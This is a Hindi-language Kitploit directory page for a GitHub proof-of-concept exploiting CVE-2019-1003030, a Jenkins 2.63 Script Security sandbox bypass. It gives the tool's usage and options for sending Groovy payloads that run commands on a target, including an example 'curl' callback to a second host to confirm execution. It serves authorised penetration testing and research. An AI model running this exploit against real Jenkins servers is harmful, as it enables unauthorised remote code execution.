Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PoC-CVE-2019-1003030 — jenkins 2.63 के लिए PoC CVE-2019-1003030 | Kitploit
उपकरण/GitHubGitHub/cyberbelly/poc-cve-2019-1003030
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubcyberbelly/poc-cve-2019-1003030

PoC-CVE-2019-1003030

jenkins 2.63 के लिए PoC CVE-2019-1003030

रिपॉजिटरी देखें
32 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

जेन्किन्स 2.63 स्क्रिप्ट सुरक्षा सैंडबॉक्स बायपास PoC

यह प्रोजेक्ट जेन्किन्स 2.63 द्वारा उपयोग किए जाने वाले Jenkins SecureGroovyScript सत्यापन एंडपॉइंट पर Groovy पेलोड बनाने और वितरित करने को स्वचालित करता है। उपकरण इंटरैक्टिव और एक-शॉट निष्पादन दोनों का समर्थन करता है। एक्सप्लॉइट कोई आउटपुट नहीं लौटाता, इसलिए आपको कुछ सत्यापन करने होंगे जैसे अपने AP पर curl करना ताकि यह सुनिश्चित हो सके कि यह काम करता है।

उपकरण दोनों का समर्थन करता है:

  • इंटरैक्टिव कमांड मोड
  • एकल कमांड निष्पादन
  • GET और POST अनुरोध
  • वैकल्पिक Jenkins CSRF crumb समर्थन

अस्वीकरण

यह प्रोजेक्ट केवल सुरक्षा अनुसंधान, CTFs, प्रयोगशाला वातावरण और अधिकृत पेनिट्रेशन टेस्टिंग के लिए है। इसे स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध उपयोग न करें।

root@kitploit:~
usage: Poc.py -u http://10.10.10.10:8080/  [-c 'curl http://10.10.10.9/callback'] [-X POST] [-p /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript]

PoC for sandbox bypass for jenkins 2.63

options:
  -h, --help            show this help message and exit
  -u, --url URL         ip of target
  -X, --method METHOD   post or get
  -b, --breadcrum BREADCRUM
                        optional jenkins crumb string
  -c, --command COMMAND
                        command to run on jenkins, not output expected
  -p, --path PATH       path to the script, you might prepend more

-c विकल्प को छोड़कर इंटरैक्टिव प्रॉम्प्ट में प्रवेश करें। नीचे उदाहरण दिया गया है, दुर्भाग्य से कोई आउटपुट नहीं है, इसलिए जब तक आपको 404 नहीं मिल रहा है, यह काम कर रहा होना चाहिए

छवि
टूल डाउनलोड करें